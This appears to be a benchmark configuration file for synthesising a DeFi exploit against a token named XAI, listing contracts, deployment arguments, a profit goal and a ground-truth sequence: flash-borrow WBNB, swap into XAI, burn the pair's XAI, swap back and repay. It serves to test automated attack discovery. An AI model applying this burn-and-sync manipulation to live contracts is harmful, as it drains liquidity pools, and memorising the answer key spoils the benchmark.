# Information for benchmarks building.
project_name: "XAI"

ctrt_name2cls:
  - ["wbnb", "WBNB"]
  - ["xai", "XAI"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]

ctrt_name2deploy:
  - ["wbnb", ""]
  - ["xai", "new XAI(\"XAI\", \"XAI\", 18, 1e11, 1, 0, 1, address(0x0), address(this))"]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]
  
extra_actions:
 - "function burn_xai_pair(uint256 amount) internal eurus {
      xai.burn(xai.totalSupply() - amount);
      pair.sync();
    }"

extra_deployments: [] 
  # - "xsij.afterDeploy(address(router), address(pair));"

extra_statements: []

attack_goal_str: "wbnb; 1e3"

groundtruth:
  - ["borrow", "wbnb", "owner", "3000 * 1e18"]
  - ["swap", "pair", "attacker", "wbnb", "xai", "wbnb.balanceOf(attacker)", "pair.getAmountOut(wbnb.balanceOf(attacker), address(wbnb))"]
  - ["burn", "xai", "pair", "10000"]
  - ["swap", "pair", "attacker", "xai", "wbnb", "xai.balanceOf(attacker)", "pair.getAmountOut(xai.balanceOf(attacker), address(xai))"]
  - ["payback", "wbnb", "owner", "3000 * 1e18"]

# Information for search space building.
roles:
  "wbnb":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "xai":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "pair":
    is_swappair: true
    is_uniswap: true
    token_pair: ["xai", "wbnb"]
    support_swaps:
      "xai": ["xai", "wbnb"]
      "wbnb": ["xai", "wbnb"]
    is_oracle: true
    oracle: "pair"

pattern: "Token Burn"
